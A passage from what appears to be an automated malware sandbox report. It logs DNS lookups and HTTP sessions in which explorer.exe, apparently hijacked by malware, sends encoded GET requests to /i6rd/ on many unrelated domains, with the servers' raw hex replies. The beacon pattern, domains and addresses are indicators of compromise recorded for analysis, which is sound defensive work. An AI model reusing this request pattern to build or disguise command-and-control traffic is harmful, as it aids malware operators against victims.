                                                                  May 12, 2021 15:48:13.560631990 CEST8.8.8.8192.168.2.40xaea8No error (0)www.socialeconomic.netsocialeconomic.netCNAME (Canonical name)IN (0x0001)
                                                                  May 12, 2021 15:48:13.560631990 CEST8.8.8.8192.168.2.40xaea8No error (0)socialeconomic.net51.222.80.112A (IP address)IN (0x0001)
                                                                  May 12, 2021 15:48:18.925479889 CEST8.8.8.8192.168.2.40x726bNo error (0)www.toypoodlebreedershome.comtoypoodlebreedershome.comCNAME (Canonical name)IN (0x0001)
                                                                  May 12, 2021 15:48:18.925479889 CEST8.8.8.8192.168.2.40x726bNo error (0)toypoodlebreedershome.com81.88.52.88A (IP address)IN (0x0001)
                                                                  May 12, 2021 15:48:24.202259064 CEST8.8.8.8192.168.2.40x30ceNo error (0)www.ricdevan.com185.53.177.53A (IP address)IN (0x0001)
                                                                  May 12, 2021 15:48:29.420010090 CEST8.8.8.8192.168.2.40xf6e2No error (0)www.ximibabes.comximyumi.myshopify.comCNAME (Canonical name)IN (0x0001)
                                                                  May 12, 2021 15:48:29.420010090 CEST8.8.8.8192.168.2.40xf6e2No error (0)ximyumi.myshopify.comshops.myshopify.comCNAME (Canonical name)IN (0x0001)
                                                                  May 12, 2021 15:48:29.420010090 CEST8.8.8.8192.168.2.40xf6e2No error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)
                                                                  May 12, 2021 15:48:34.835792065 CEST8.8.8.8192.168.2.40xcfb4No error (0)www.sabaidiving.com192.64.147.164A (IP address)IN (0x0001)
                                                                  May 12, 2021 15:48:40.366614103 CEST8.8.8.8192.168.2.40xb2a5No error (0)www.onemoresysadmin.comonemoresysadmin.comCNAME (Canonical name)IN (0x0001)
                                                                  May 12, 2021 15:48:40.366614103 CEST8.8.8.8192.168.2.40xb2a5No error (0)onemoresysadmin.com192.0.78.24A (IP address)IN (0x0001)
                                                                  May 12, 2021 15:48:40.366614103 CEST8.8.8.8192.168.2.40xb2a5No error (0)onemoresysadmin.com192.0.78.25A (IP address)IN (0x0001)
                                                                  May 12, 2021 15:48:45.522173882 CEST8.8.8.8192.168.2.40x4cc3No error (0)www.countrywideeconomy.com52.58.78.16A (IP address)IN (0x0001)
                                                                  May 12, 2021 15:48:55.690572977 CEST8.8.8.8192.168.2.40xfd6Name error (3)www.woo.educationnonenoneA (IP address)IN (0x0001)

                                                                  HTTP Request Dependency Graph

                                                                  • www.thebenefitssherpa.com
                                                                  • www.onlinecasinocrazy.com
                                                                  • www.blissfulbeeboutique.online
                                                                  • www.cityofhouston.info
                                                                  • www.socialeconomic.net
                                                                  • www.toypoodlebreedershome.com
                                                                  • www.ricdevan.com
                                                                  • www.ximibabes.com
                                                                  • www.sabaidiving.com
                                                                  • www.onemoresysadmin.com
                                                                  • www.countrywideeconomy.com

                                                                  HTTP Packets

                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  0192.168.2.44975234.102.136.18080C:\Windows\explorer.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  May 12, 2021 15:47:49.762125969 CEST1675OUTGET /i6rd/?gHSLCj58=LPK2IT8klZq3HV5LkVv0HrUERmrfkAigbODxoDO8ybIsb03GvAFTkZSuj3fGszWvHktP&9rJ=N8YdlZih HTTP/1.1
                                                                  Host: www.thebenefitssherpa.com
                                                                  Connection: close
                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                  Data Ascii:
                                                                  May 12, 2021 15:47:49.899209023 CEST1684INHTTP/1.1 403 Forbidden
                                                                  Server: openresty
                                                                  Date: Wed, 12 May 2021 13:47:49 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 275
                                                                  ETag: "60995c26-113"
                                                                  Via: 1.1 google
                                                                  Connection: close
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                  Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  1192.168.2.449762119.81.45.8280C:\Windows\explorer.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  May 12, 2021 15:47:55.530891895 CEST5420OUTGET /i6rd/?gHSLCj58=erkeaSWQY+Clkg2r/Pi/REnUuZTidSmaWK+TmjN6ZRgeJAvAzvFr0iNL5kMJBQzOKWdi&9rJ=N8YdlZih HTTP/1.1
                                                                  Host: www.onlinecasinocrazy.com
                                                                  Connection: close
                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                  Data Ascii:


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  10192.168.2.44977352.58.78.1680C:\Windows\explorer.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  May 12, 2021 15:48:45.566056013 CEST6199OUTGET /i6rd/?gHSLCj58=HOLe4E5VAs/9VGl0AghSjQ5UDYBgOj/qhjKLxJJROTaYJ7IE9VG9ZYc05xBD+gnk3HpC&9rJ=N8YdlZih HTTP/1.1
                                                                  Host: www.countrywideeconomy.com
                                                                  Connection: close
                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                  Data Ascii:
                                                                  May 12, 2021 15:48:45.607007027 CEST6200INHTTP/1.1 410 Gone
                                                                  Server: openresty
                                                                  Date: Wed, 12 May 2021 13:47:39 GMT
                                                                  Content-Type: text/html
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Data Raw: 37 0d 0a 3c 68 74 6d 6c 3e 0a 0d 0a 39 0d 0a 20 20 3c 68 65 61 64 3e 0a 0d 0a 35 36 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 72 65 66 72 65 73 68 27 20 63 6f 6e 74 65 6e 74 3d 27 35 3b 20 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 2e 63 6f 75 6e 74 72 79 77 69 64 65 65 63 6f 6e 6f 6d 79 2e 63 6f 6d 2f 27 20 2f 3e 0a 0d 0a 61 0d 0a 20 20 3c 2f 68 65 61 64 3e 0a 0d 0a 39 0d 0a 20 20 3c 62 6f 64 79 3e 0a 0d 0a 34 32 0d 0a 20 20 20 20 59 6f 75 20 61 72 65 20 62 65 69 6e 67 20 72 65 64 69 72 65 63 74 65 64 20 74 6f 20 68 74 74 70 3a 2f 2f 77 77 77 2e 63 6f 75 6e 74 72 79 77 69 64 65 65 63 6f 6e 6f 6d 79 2e 63 6f 6d 0a 0d 0a 61 0d 0a 20 20 3c 2f 62 6f 64 79 3e 0a 0d 0a 38 0d 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 7<html>9 <head>56 <meta http-equiv='refresh' content='5; url=http://www.countrywideeconomy.com/' />a </head>9 <body>42 You are being redirected to http://www.countrywideeconomy.coma </body>8</html>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  2192.168.2.449763198.185.159.14480C:\Windows\explorer.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  May 12, 2021 15:48:02.005036116 CEST6102OUTGET /i6rd/?gHSLCj58=smN73hIgGm+8k6TIdjzBFwruzJIggaSM7b/fO07bhI8vXH2xBAb/Cwk8Hoq4ZaNv9SU/&9rJ=N8YdlZih HTTP/1.1
                                                                  Host: www.blissfulbeeboutique.online
                                                                  Connection: close
                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                  Data Ascii:
                                                                  May 12, 2021 15:48:02.140299082 CEST6103INHTTP/1.1 400 Bad Request
                                                                  Cache-Control: no-cache, must-revalidate
                                                                  Content-Length: 77564
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Date: Wed, 12 May 2021 13:48:02 UTC
                                                                  Expires: Thu, 01 Jan 1970 00:00:00 UTC
                                                                  Pragma: no-cache
                                                                  Server: Squarespace
                                                                  X-Contextid: gCs6earh/9UltTqOd
                                                                  Connection: close
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 73 70 61 6e 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 31 31 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 65 6d 3b 0a 20 20 20 20
                                                                  Data Ascii: <!DOCTYPE html><head> <title>400 Bad Request</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <style type="text/css"> body { background: white; } main { position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); text-align: center; min-width: 95vw; } main h1 { font-weight: 300; font-size: 4.6em; color: #191919; margin: 0 0 11px 0; } main p { font-size: 1.4em; color: #3a3a3a; font-weight: 300; line-height: 2em; margin: 0; } main p a { color: #3a3a3a; text-decoration: none; border-bottom: solid 1px #3a3a3a; } body { font-family: "Clarkson", sans-serif; font-size: 12px; } #status-page { display: none; } footer { position: absolute; bottom: 22px; left: 0; width: 100%; text-align: center; line-height: 2em; } footer span { margin: 0 11px; font-size: 1em;
                                                                  May 12, 2021 15:48:02.140330076 CEST6104INData Raw: 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 61 39 61 39 61 39 3b 0a 20 20 20 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 6e 6f 77 72 61 70 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 73 70 61 6e 20
                                                                  Data Ascii: font-weight: 300; color: #a9a9a9; white-space: nowrap; } footer span strong { font-weight: 300; color: #191919; } @media (max-width: 600px) { body { font-size: 10px; } } @font-face { font-family
                                                                  May 12, 2021 15:48:02.140355110 CEST6105INData Raw: 5a 63 36 54 67 4b 77 31 43 5a 4c 45 58 79 47 5a 76 49 55 6a 4a 54 46 4c 57 58 69 45 6a 6b 6a 50 2f 45 62 4e 73 72 37 4a 58 55 39 6b 62 54 57 76 76 4e 49 74 64 68 59 66 30 56 70 6a 56 43 35 78 36 41 57 48 30 43 6f 70 4a 39 6b 4c 4c 32 46 4d 6f 34
                                                                  Data Ascii: Zc6TgKw1CZLEXyGZvIUjJTFLWXiEjkjP/EbNsr7JXU9kbTWvvNItdhYf0VpjVC5x6AWH0CopJ9kLL2FMo41uoZFFIwX0vyHuEjHYH2VmrxOkqFo0adgxDecFou4ep9oyEd/DYGc3ZB+z+7LZeRzLqapLukxRFwknNZLe1mD3UUryptN0i8agj3nXEkMT3jM6TFgFmSPui9ANP5tgumW+7GL2HT49v6T21zEFSmU/PyRmlIHkbMt
                                                                  May 12, 2021 15:48:02.140372038 CEST6106INData Raw: 41 62 54 6a 45 6d 75 66 55 51 6f 51 67 41 37 52 69 72 39 61 39 68 5a 78 71 47 69 48 63 52 46 7a 33 71 43 59 53 35 6f 69 36 56 6e 58 56 63 2b 31 6a 6f 48 35 33 57 4c 6c 77 6a 39 5a 58 78 72 33 37 75 63 66 65 38 35 4b 59 62 53 5a 45 6e 4e 50 71 75
                                                                  Data Ascii: AbTjEmufUQoQgA7Rir9a9hZxqGiHcRFz3qCYS5oi6VnXVc+1joH53WLlwj9ZXxr37ucfe85KYbSZEnNPquYQLdZGuGjum67O6vs4pznNN15fYXFdOLuLWXrsKEmCQSfZo21npOsch0vJ4uwm8gxs1rVFd7xXNcYLdHOA8u6Q+yN/ryi71Hun8adEPitdau1oRoJdRdmo7vWKu+0nK470m8D6uPnOKeCe7xMpwlB3s5Szbpd7HP+
                                                                  May 12, 2021 15:48:02.140397072 CEST6107INData Raw: 64 57 72 56 38 34 7a 76 71 7a 55 70 39 38 37 66 66 4f 71 71 2b 70 6a 34 6c 4d 59 63 71 2b 5a 58 75 5a 73 78 54 49 4d 35 5a 7a 6e 4f 75 49 56 7a 61 6e 45 38 43 58 6a 4f 52 4a 38 38 35 36 67 57 65 63 49 73 37 33 47 34 49 56 61 54 6f 6d 2b 46 64 5a
                                                                  Data Ascii: dWrV84zvqzUp987ffOqq+pj4lMYcq+ZXuZsxTIM5ZznOuIVzanE8CXjORJ8856gWecIs73G4IVaTom+FdZmk13iQhZpVvwWaeJJvZwmZfgLrMEPDsmWSeTP2pgBIVqr44ljnDOc42NDfmKJscRnzjslLu8YD7DeUiQta8q+gTM8UuJgxqs1ltlxGmF3mHRe8w7M6YKbpYWBIZw6abAXoINXCHv8WIYdhau8bWC2V991qxUKLIeS
                                                                  May 12, 2021 15:48:02.140419006 CEST6108INData Raw: 73 55 74 73 78 4c 45 35 68 38 53 70 70 4e 4d 66 78 35 69 6a 57 48 70 62 33 6d 5a 31 45 36 68 46 5a 43 4f 74 4a 6d 38 39 4a 38 42 6e 78 37 48 39 43 4d 66 7a 59 41 58 4d 37 66 6d 78 47 73 68 77 4c 6a 56 68 6f 78 30 49 4c 46 71 72 77 35 2b 64 6f 7a
                                                                  Data Ascii: sUtsxLE5h8SppNMfx5ijWHpb3mZ1E6hFZCOtJm89J8Bnx7H9CMfzYAXM7fmxGshwLjVhox0ILFqrw5+doz1Kt5lGsvahyjMuRVHINKIASaMX6Aaz/zP39dVJaibMTznE8XEmMq8H7zHPYm8ZeF/aKMDTB0O12KY6trbCV4ekxPC26HLAH2M1LTSQ0hyP1ROTBMgNLCwxVMHS4fHg2e2RNqvGnJI340EzbSTZWms3Y345WE1qeFI
                                                                  May 12, 2021 15:48:02.140440941 CEST6110INData Raw: 6a 66 69 63 35 33 53 6e 75 34 72 53 74 2b 48 74 59 6a 2b 4a 76 41 47 4a 49 64 55 67 7a 75 6b 70 63 44 65 4a 72 47 31 62 6d 34 57 73 62 6c 75 59 78 4f 77 31 62 47 7a 77 4c 30 44 74 4c 41 71 42 6c 41 74 30 35 36 4c 61 6a 65 7a 71 36 48 72 5a 50 77
                                                                  Data Ascii: jfic53Snu4rSt+HtYj+JvAGJIdUgzukpcDeJrG1bm4WsbluYxOw1bGzwL0DtLAqBlAt056Lajezq6HrZPw/M09kfgGcfzBOwryRaVDs6DJQcm6Z8PXsbsd4goAUYk4XLU6HLUiC2fVyfFCeYUc9OUuGlK7uaNENPDxPKgKHrPYD2KRgA0Jz1pdYiVah3ihI8SsbuZ7Qut7FtdT28OepdJALQ9kcuIqJaIlksKpGWQaBJEs5Ro2u
                                                                  May 12, 2021 15:48:02.140465021 CEST6111INData Raw: 49 73 56 6e 48 51 76 47 66 48 4a 59 2b 47 73 46 4f 76 65 49 61 4c 6b 5a 54 6f 6d 2b 43 35 70 6e 6e 30 5a 74 5a 4f 73 63 53 62 64 54 51 5a 49 5a 49 6a 7a 4e 47 71 33 6a 5a 65 59 56 58 71 62 44 42 4b 37 7a 4f 50 76 37 4e 6d 78 7a 6d 4d 43 6f 36 79
                                                                  Data Ascii: IsVnHQvGfHJY+GsFOveIaLkZTom+C5pnn0ZtZOscSbdTQZIZIjzNGq3jZeYVXqbDBK7zOPv7NmxzmMCo6yxGOpqJLxQEPP8ebkh2xjxPso8Vpyed4bWtGDod5nbfYx2tE9IjIcwqDOQxCLgjqhrjJapxQj5aykZ/KjJyp8vYw2jOkioWHg6QaitbobouivfRYdGlwB0//RiIvIqLJ/al9rsfi5oavS3VijivkmceYKJ2jlOzsy3
                                                                  May 12, 2021 15:48:02.140486956 CEST6112INData Raw: 62 61 4b 64 68 59 6b 30 71 76 4f 51 56 49 71 79 6b 70 38 72 73 6c 57 4b 4b 62 77 45 6d 55 72 39 49 52 64 38 6c 67 73 49 66 2b 75 77 66 68 39 72 73 6a 2f 2f 30 34 7a 38 50 49 39 68 69 6d 33 61 35 51 30 68 41 67 43 76 57 73 45 6c 37 48 4c 47 6b 53
                                                                  Data Ascii: baKdhYk0qvOQVIqykp8rslWKKbwEmUr9IRd8lgsIf+uwfh9rsj//04z8PI9him3a5Q0hAgCvWsEl7HLGkSm8xy74a7RIq2RyhLLq4vENxWg6Z8OdDn9k/pO8nvZ82B9HQH4suep5bgnoW/t4r+OSsr3KDZZ7hjnjRmpSwWGJ1Rz24Sgbupfrusw+nYg9brZp6vKv2bXV9yNo3FwRf1UmbhULadGRmefHVN7jCO1g05Yzd4bBIOY
                                                                  May 12, 2021 15:48:02.140507936 CEST6114INData Raw: 50 33 55 43 44 61 59 67 2f 34 41 2f 4a 38 2b 65 6d 71 41 74 30 47 53 57 39 51 6d 2b 6b 37 6b 35 75 59 62 72 75 30 61 4e 30 4a 59 59 52 78 4a 2b 54 49 52 2b 6e 4c 46 4d 64 4f 39 39 63 4f 75 69 69 68 38 46 49 79 73 53 4d 78 4b 7a 59 77 45 59 32 73
                                                                  Data Ascii: P3UCDaYg/4A/J8+emqAt0GSW9Qm+k7k5uYbru0aN0JYYRxJ+TIR+nLFMdO99cOuiih8FIysSMxKzYwEY2sYWtbOMEdrKbPexlHwd4Hi/ghbyIF/MSXuoOf52DHIoeT/J0/wJ3SqRpQnpexxt4N+/hvbyP9ztH3+MHTs4d3Mnd3MuDPMpjQmmVVVe7pmpu5KHLiejRfHs+PruYnKemd+nbnlzBbpT+/sSSBYiT///ekfH78UPEBW
                                                                  May 12, 2021 15:48:02.272782087 CEST6115INData Raw: 39 79 46 49 39 70 49 64 59 71 59 66 31 4d 41 4e 36 52 49 2b 77 53 49 2f 71 55 5a 5a 48 77 6a 6f 6a 59 54 73 6a 59 66 6d 34 36 56 4d 69 5a 79 64 45 7a 72 5a 48 7a 71 5a 46 7a 72 5a 46 7a 6e 5a 45 7a 72 4b 52 73 33 7a 6b 72 44 74 79 6c 6f 75 63 37
                                                                  Data Ascii: 9yFI9pIdYqYf1MAN6RI+wSI/qUZZHwjojYTsjYfm46VMiZydEzrZHzqZFzrZFznZEzrKRs3zkrDtylouc7Y6c5SNn2chZLr75MySMUDeDNMxk2kyDdtPEJJOKxLSMvRjTTD7cnRbuTgp3m8OV6eHKjHBlZrgyK1yZHa7MCVfmhivzwpWOcKUzXOkKV7rDlZ5wpTdc6QtX+sOVgfBjOPwohx9Tw4/28CMXfmTCj9bwoxZ+JOFHMf


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  3192.168.2.449764103.15.186.6880C:\Windows\explorer.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  May 12, 2021 15:48:07.924396992 CEST6139OUTGET /i6rd/?gHSLCj58=OPhbRlTkoXrsQ0r3dKw1IvWRRcBcb3Q4dmj86tcXQUJSZPkW56a8j7HjPVLeeIGxTFMj&9rJ=N8YdlZih HTTP/1.1
                                                                  Host: www.cityofhouston.info
                                                                  Connection: close
                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                  Data Ascii:
                                                                  May 12, 2021 15:48:08.279015064 CEST6139INHTTP/1.1 404 Not Found
                                                                  Server: nginx/1.14.0
                                                                  Date: Wed, 12 May 2021 13:48:08 GMT
                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                  Content-Length: 387
                                                                  Connection: close
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 63 69 74 79 6f 66 68 6f 75 73 74 6f 6e 2e 69 6e 66 6f 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache Server at www.cityofhouston.info Port 80</address></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  4192.168.2.44976551.222.80.11280C:\Windows\explorer.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  May 12, 2021 15:48:13.697396994 CEST6140OUTGET /i6rd/?gHSLCj58=ghT/ntM+diyN3YW/4q0tO05CJd4dCe68Gx0VtJcOz7kJ2fBcIsU6AMgtishNfwDLzL+S&9rJ=N8YdlZih HTTP/1.1
                                                                  Host: www.socialeconomic.net
                                                                  Connection: close
                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                  Data Ascii:
                                                                  May 12, 2021 15:48:13.830612898 CEST6141INHTTP/1.1 301 Moved Permanently
                                                                  Date: Wed, 12 May 2021 13:48:13 GMT
                                                                  Server: Apache
                                                                  Content-Security-Policy: upgrade-insecure-requests;
                                                                  Location: https://www.socialeconomic.net/i6rd/?gHSLCj58=ghT/ntM+diyN3YW/4q0tO05CJd4dCe68Gx0VtJcOz7kJ2fBcIsU6AMgtishNfwDLzL+S&9rJ=N8YdlZih
                                                                  Content-Length: 339
                                                                  Connection: close
                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 73 6f 63 69 61 6c 65 63 6f 6e 6f 6d 69 63 2e 6e 65 74 2f 69 36 72 64 2f 3f 67 48 53 4c 43 6a 35 38 3d 67 68 54 2f 6e 74 4d 2b 64 69 79 4e 33 59 57 2f 34 71 30 74 4f 30 35 43 4a 64 34 64 43 65 36 38 47 78 30 56 74 4a 63 4f 7a 37 6b 4a 32 66 42 63 49 73 55 36 41 4d 67 74 69 73 68 4e 66 77 44 4c 7a 4c 2b 53 26 61 6d 70 3b 39 72 4a 3d 4e 38 59 64 6c 5a 69 68 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.socialeconomic.net/i6rd/?gHSLCj58=ghT/ntM+diyN3YW/4q0tO05CJd4dCe68Gx0VtJcOz7kJ2fBcIsU6AMgtishNfwDLzL+S&amp;9rJ=N8YdlZih">here</a>.</p></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
